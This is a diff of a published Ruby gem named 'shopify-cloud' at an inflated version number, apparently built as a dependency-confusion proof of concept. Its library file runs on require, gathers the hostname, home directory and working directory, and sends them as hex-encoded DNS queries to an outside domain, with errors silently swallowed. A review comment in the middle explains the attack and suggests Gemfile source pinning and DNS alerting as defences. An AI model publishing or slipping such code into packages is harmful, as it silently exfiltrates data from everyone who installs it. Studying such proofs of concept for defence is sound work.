shopify-cloud 2300.4.2

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/shopify-cloud.rb +64 -0
  3. metadata +44 -0
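--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+---
+SHA256:
+metadata.gz: cc90152107465aff369870b099d498aaad4e34597151f100caff81e8a150fb24
+data.tar.gz: 4df10ee9b2c3f5e1bb05ebe2b2d6d7f9608c561969d8b6b8c06ec08b73c23129
+SHA512:
+metadata.gz: 24b344ada3dc706692be320d68b3e2fd5256969badd210e4a55805dc4e58b4371e76cb91d00c4c58c5157e5577686d7cbcfbceac4f9b7072fbee9e4aac33153e
+data.tar.gz: 5922cfb04864a379a41d2c8980cc018c9053d0ab9cf24a42ac5b137f4a5429610126f1ceb928fab55d5dd66f09801f674ddd0525982a5c32f9c0fd183fcddf4f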
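--- a/data/lib/shopify-cloud.rb
+++ b/data/lib/shopify-cloud.rb
@@ -0,0 +1,64 @@
+
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+alex@ethicalhack.ro
+https://twitter.com/alxbrsn
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '.dns.alexbirsan-hacks-paypal.com'
+ns = 'dns1.alexbirsan-hacks-paypal.com'
+
+package = 'shopify-cloud'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+'p' => package,
+'h' => Socket.gethostname,
+'d' => File.expand_path('~'),
+'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+ns_ip = Resolv.getaddress(ns)
+rescue
+ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new,
+Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+begin
+Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+rescue; end
+
+begin
+custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+rescue; end
+end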
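Review bot: Every statement here is at the top level of `lib/shopify-cloud.rb`, so merely requiring the gem sends the `data` hash (hostname, home directory, working directory) off the host as hex-encoded DNS labels under `suffix`; the header's "No sensitive data is retrieved" understates this, since those paths routinely contain usernames and internal project names. Both lookups are wrapped in `begin … rescue; end`, so nothing is logged or raised on the host, and the second resolver is pointed at `ns_ip` (falling back to `4.4.4.4`) and `8.8.8.8`, presumably so the queries still leave when the system resolver would not forward them. The 2300.4.2 version on a name that looks like an internal package suggests the gem is meant to win version resolution over a private gem of the same name. On the consuming side, declare the private gem inside a `source "<private-gem-server-url>" do … end` block in the Gemfile so it can only resolve from that server, and alert on DNS queries that carry several long hex labels to an unfamiliar domain.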
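--- a/metadata
+++ b/metadata
@@ -0,0 +1,44 @@
+--- !ruby/object:Gem::Specification
+name: shopify-cloud
+version: !ruby/object:Gem::Version
+version: 2300.4.2
+platform: ruby
+authors:
+- Alex Birsan
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2020-09-14 00:00:00.000000000 Z
+dependencies: []
+description: This package is meant for security research purposes and does not contain
+any useful code.
+email: alex@ethicalhack.ro
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/shopify-cloud.rb
+homepage: https://twitter.com/alxbrsn
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+requirements: []
+rubygems_version: 3.0.3
+signing_key:
+specification_version: 4
+summary: Security research purposes only
+test_files: []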